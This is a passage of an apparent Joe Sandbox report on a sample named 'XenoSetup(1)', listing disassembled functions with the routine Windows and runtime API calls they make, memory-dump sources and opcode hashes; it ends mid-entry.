                                                                                      • Instruction Fuzzy Hash: 03416DB0905B809EE724CF3A8885AE7FBE5BF19310F504A2ED5FE83281C7352654DB10
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00FFB098
                                                                                        • Part of subcall function 00FE13DC: __EH_prolog.LIBCMT ref: 00FE13E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: 215309cea613fa9fd6e98f14837f378eeb947b820d8a96d798fdf26abffcbe31
                                                                                      • Instruction ID: 75ec14512e6286f833fa4c615d1c66145ffa99256c95a302c8737ce244f02a4c
                                                                                      • Opcode Fuzzy Hash: 215309cea613fa9fd6e98f14837f378eeb947b820d8a96d798fdf26abffcbe31
                                                                                      • Instruction Fuzzy Hash: 3D316A75C002899EDB15DFA5CC50AFEBBB4AF09300F10449AE409B7292D739AE04DBA1
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(00000000,01013A34), ref: 0100ACF8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc
                                                                                      • String ID:
                                                                                      • API String ID: 190572456-0
                                                                                      • Opcode ID: 863914dd584b1901dbfdc4b531772a6c7e90ad76bdda4187c135f449f7261b22
                                                                                      • Instruction ID: b0fe4ea911825610ddf136aede151477948de1f2e970406160a10da97384231b
                                                                                      • Opcode Fuzzy Hash: 863914dd584b1901dbfdc4b531772a6c7e90ad76bdda4187c135f449f7261b22
                                                                                      • Instruction Fuzzy Hash: 3611AB33700729EFBB37AD1CD85095E77D5AB84260F164161EDD5AB284D635DC0187D0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: d8b7dfeef839d51de75a4ecb3dbed084eb0e2c4ccb0ef994103613d9f6eb9c3e
                                                                                      • Instruction ID: aac972b548801f700f672c011f312cf1593bc59ee8db9ce1084ce206d841614b
                                                                                      • Opcode Fuzzy Hash: d8b7dfeef839d51de75a4ecb3dbed084eb0e2c4ccb0ef994103613d9f6eb9c3e
                                                                                      • Instruction Fuzzy Hash: 3E016933D005A8ABCF11AFA9CC419DEB736BF88750F014515F915B7161DA788D05E6B1
                                                                                      APIs
                                                                                        • Part of subcall function 0100B136: RtlAllocateHeap.NTDLL(00000008,01013A34,00000000,?,0100989A,00000001,00000364,?,?,?,00FED984,?,?,?,00000004,00FED710), ref: 0100B177
                                                                                      • _free.LIBCMT ref: 0100C4E5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap_free
                                                                                      • String ID:
                                                                                      • API String ID: 614378929-0
                                                                                      • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                      • Instruction ID: 279670247669cb11dab6d7bf08a3f41e260391ed4ecc68332f9b3986ce60cfba
                                                                                      • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                      • Instruction Fuzzy Hash: F901FE726003066BF3328F59D8859AAFBEDFB85270F26065DD5D4832C1EA30A905C774
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000008,01013A34,00000000,?,0100989A,00000001,00000364,?,?,?,00FED984,?,?,?,00000004,00FED710), ref: 0100B177
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: 2bfd7347c7beb9dec7a98dc95588042c50ef50fad8035a382773ab1ec5056aa8
                                                                                      • Instruction ID: a5640b7fdec4b5760e2210a0d25b13fbb967810d3f778e43b925f8a4756cc418
                                                                                      • Opcode Fuzzy Hash: 2bfd7347c7beb9dec7a98dc95588042c50ef50fad8035a382773ab1ec5056aa8
                                                                                      • Instruction Fuzzy Hash: 86F0B43A605525A7FB735A25AC05BDF3B88AF81B70F488251EDD89A1C0CA24D50182E4
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 01003C3F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc
                                                                                      • String ID:
                                                                                      • API String ID: 190572456-0
                                                                                      • Opcode ID: c6adea42bb4215fb96612b78a9d830ff560d46fae3d073fbe5dae13b10cef57e
                                                                                      • Instruction ID: 89ad7d723f7cf51afe55aa938628c9369d909ddf3bf77ff4c77284ba10e5e9cc
                                                                                      • Opcode Fuzzy Hash: c6adea42bb4215fb96612b78a9d830ff560d46fae3d073fbe5dae13b10cef57e
                                                                                      • Instruction Fuzzy Hash: DBF0823620461A9FAF138E6EEC10E9A77D9BF41A61B144524FA85CA1C0DB31E460C790
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0100CA2C,00000000,?,01006CBE,?,00000008,?,010091E0,?,?,?), ref: 01008E38
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: f93d3adbdc7c16764c92bcf6154c1f63147aa41af4d40ed201bd140dd16f5130
                                                                                      • Instruction ID: 80ec4fe05348ce409efbdd0471940eb99452ff67393903e7d10fb022e6fe53f7
                                                                                      • Opcode Fuzzy Hash: f93d3adbdc7c16764c92bcf6154c1f63147aa41af4d40ed201bd140dd16f5130
                                                                                      • Instruction Fuzzy Hash: 4BE06531A0259557FAB326699C04BDF7A9CBB517B4F058153ADD8960C1CB25DD0082E5
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00FE5AC2
                                                                                        • Part of subcall function 00FEB505: __EH_prolog.LIBCMT ref: 00FEB50A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: e4ca4fe34a5239bd4fd8755a9a0acafea94c263f446a9e39cd58fd70aa4185a3
                                                                                      • Instruction ID: 25bcea9a512439b23b30ae062271276631acc8660ecaf05f16cba858d45d62e4
                                                                                      • Opcode Fuzzy Hash: e4ca4fe34a5239bd4fd8755a9a0acafea94c263f446a9e39cd58fd70aa4185a3
                                                                                      • Instruction Fuzzy Hash: FF018C308107D8DAD725E7B8C8517EDFBA4AF64304F54848DA556A3393CFB81B08E7A2
                                                                                      APIs
                                                                                        • Part of subcall function 00FEA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00FEA592,000000FF,?,?), ref: 00FEA6C4
                                                                                        • Part of subcall function 00FEA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00FEA592,000000FF,?,?), ref: 00FEA6F2
                                                                                        • Part of subcall function 00FEA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00FEA592,000000FF,?,?), ref: 00FEA6FE
                                                                                      • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00FEA598
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$FileFirst$CloseErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1464966427-0
                                                                                      • Opcode ID: 5ce85582fe7c160d33c491781d2300e08a9ac25051bfddb4c65eac228fdefa3b
                                                                                      • Instruction ID: 5ae1a252fe8da930485eebcf4c9d5b9fae36377d58ab301372bc6cf8e267faeb
                                                                                      • Opcode Fuzzy Hash: 5ce85582fe7c160d33c491781d2300e08a9ac25051bfddb4c65eac228fdefa3b
                                                                                      • Instruction Fuzzy Hash: BAF082324087D0AACB225BB58D05BCB7BD06F1A331F188A49F1FD62196C2796094AB23
                                                                                      APIs
                                                                                      • SetThreadExecutionState.KERNEL32(00000001), ref: 00FF0E3D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ExecutionStateThread
                                                                                      • String ID:
                                                                                      • API String ID: 2211380416-0
                                                                                      • Opcode ID: d463d6f87276cbc1aa834463334664f4fd726cf5871db1f43550e39331ef417f
                                                                                      • Instruction ID: 1bfbfe6909c371267e35eacb34daf4ae2dbc4ed268a9e2a538a056cc1a7523ad
                                                                                      • Opcode Fuzzy Hash: d463d6f87276cbc1aa834463334664f4fd726cf5871db1f43550e39331ef417f
                                                                                      • Instruction Fuzzy Hash: C3D0C220B0109CD6DA2133296859BFE3A069FD6721F0C0065F3899B197CE9D0842B361
                                                                                      APIs
                                                                                      • GdipAlloc.GDIPLUS(00000010), ref: 00FFA62C
                                                                                        • Part of subcall function 00FFA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00FFA3DA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                      • String ID:
                                                                                      • API String ID: 1915507550-0
                                                                                      • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                      • Instruction ID: 01b210e5ade2ac8808bfe1fc3ff9bfb2b4b230c78973707ee780a88d356442e5
                                                                                      • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                      • Instruction Fuzzy Hash: 83D0C7B561020DB6DF416B618C1297E7995EF40350F048125BF45D5171EAB5D910B552
                                                                                      APIs
                                                                                      • DloadProtectSection.DELAYIMP ref: 00FFE5E3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: DloadProtectSection
                                                                                      • String ID:
                                                                                      • API String ID: 2203082970-0
                                                                                      • Opcode ID: 198c9d08dc30304eab92b0b00e3212da90dcc2e7e1ec173f7b8de8df7e3b0d91
                                                                                      • Instruction ID: 632170ae421dd42d0a7bab3135a098a8d5aa13a46e3e7e39d88d09845c6b3781
                                                                                      • Opcode Fuzzy Hash: 198c9d08dc30304eab92b0b00e3212da90dcc2e7e1ec173f7b8de8df7e3b0d91
                                                                                      • Instruction Fuzzy Hash: 3CD0A9F448034C8BC221FAA8AE827343650BB24750F980001B3C4DA078DA7D50C0EB09
                                                                                      APIs
                                                                                      • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00FF1B3E), ref: 00FFDD92
                                                                                        • Part of subcall function 00FFB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FFB579
                                                                                        • Part of subcall function 00FFB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FFB58A
                                                                                        • Part of subcall function 00FFB568: IsDialogMessageW.USER32(00090028,?), ref: 00FFB59E
                                                                                        • Part of subcall function 00FFB568: TranslateMessage.USER32(?), ref: 00FFB5AC
                                                                                        • Part of subcall function 00FFB568: DispatchMessageW.USER32(?), ref: 00FFB5B6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                      • String ID:
                                                                                      • API String ID: 897784432-0
                                                                                      • Opcode ID: 20dd8c8c81b621fedca598a3e80e9d8f91ec15bc2e6c028732d8e8f991f53c1f
                                                                                      • Instruction ID: 688ae9db8d596e3f5f59fc957e6e2db9a432f65ba01d2534d379804a843bbf1d
                                                                                      • Opcode Fuzzy Hash: 20dd8c8c81b621fedca598a3e80e9d8f91ec15bc2e6c028732d8e8f991f53c1f
                                                                                      • Instruction Fuzzy Hash: DED09E75144300BBD6112B51CE06F1A7AE2BF98B04F404555B384740B5CA7A9D21EB11
                                                                                      APIs
                                                                                      • GetFileType.KERNELBASE(000000FF,00FE97BE), ref: 00FE98C8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: FileType
                                                                                      • String ID:
                                                                                      • API String ID: 3081899298-0
                                                                                      • Opcode ID: c2fa32bd050227bfeba1232199a17c19489d53ee2bb067d38fc53948184ad8ad
                                                                                      • Instruction ID: 9d6595e513db260f2592e351af226f1fe0d5acba528f02f4758f09070a69ea39
                                                                                      • Opcode Fuzzy Hash: c2fa32bd050227bfeba1232199a17c19489d53ee2bb067d38fc53948184ad8ad
                                                                                      • Instruction Fuzzy Hash: B5C012348082858ACE318A2698480997322BA933B67F49694D068890B1C367CD8BFB22
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 27cdee04d1ca83b7fa521c135fe6e7fcd452f0e919ec08463c7544e8ebbf9cf5
                                                                                      • Instruction ID: d1adf6b6ec5a505703b889785f9aa8a487b1312c3117a081f4a655b01adb07ff
                                                                                      • Opcode Fuzzy Hash: 27cdee04d1ca83b7fa521c135fe6e7fcd452f0e919ec08463c7544e8ebbf9cf5
                                                                                      • Instruction Fuzzy Hash: 32B012D2298144BD311466075D02D37125CDAC1F20330C03EFD46C8170E844DC442431
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 24ae6ccc89fcab325e0506035b33bd1c3ba0b266ab78283f6b06ffe183224a81
                                                                                      • Instruction ID: 2cfcbe6b151b505a865ff704504cb34052fac6c7b47dc3e7b8a0b4df6b081496
                                                                                      • Opcode Fuzzy Hash: 24ae6ccc89fcab325e0506035b33bd1c3ba0b266ab78283f6b06ffe183224a81
                                                                                      • Instruction Fuzzy Hash: C5B012D629C208AE3114614B5D43D37121CEAC0F20330403EF946C8070E8449C402531
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3
